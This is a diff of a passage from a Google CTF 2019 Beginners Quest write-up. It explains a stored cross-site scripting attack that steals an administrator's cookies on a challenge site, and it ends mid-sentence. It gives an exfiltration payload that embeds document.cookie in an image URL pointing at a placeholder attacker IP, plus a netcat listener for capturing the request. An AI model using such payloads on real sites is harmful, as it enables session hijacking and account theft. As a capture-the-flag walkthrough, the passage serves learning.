konelav/writeups/GoogleCTF2019-BQ/Day3.Government.Agriculture.Network.md

     Your post was submitted for review.
 Administator will take a look shortly.

-Well, if *administrator* will open and look on every owr post, then it is Cross-Site-Scripting (XSS) problem for sure, and all what we need is to send some specially crafted message that will do some useful thing being *looked* (*opened* in web browser) by Administrator.
+Well, if *administrator* will open and look on every owr post, then it is Cross-Site-Scripting (XSS) task for sure, and all what we need is to send some specially crafted message that will do some useful thing being *looked* (*opened* in web browser) by Administrator.
 Basically it is a text that contains javascript.
 This javascript will be executed by Administrator's browser and hence have access to some interesting data like cookies.
 For example, we can enforce Administrator's browser to try to load image from other site and embed in URL value of `document.cookie`.
-There will be no image at that URL, but it will too late, the request with data already will be captured.
+There will be no image at that URL, but it will be too late, the request with data already will be captured.
 But how can we see this request?
-One way is to open listening tcp socket (`nc -l 12345`) and crafting URL to fake image like `"http://<our-external-ip>:12345/img.png?cookie="+document.cookie` and see the request in terminal.
+One way is to open listening tcp socket (`nc -l 12345`) and to craft URL to fake image like `"http://<our-external-ip>:12345/img.png?cookie="+document.cookie` and to see the request in terminal.
 But what if we have no external IP, or have connection via uncontrolled strict firewall or just do not want to open our port for incoming connections?
 There is good web service for this situation that I saw on other's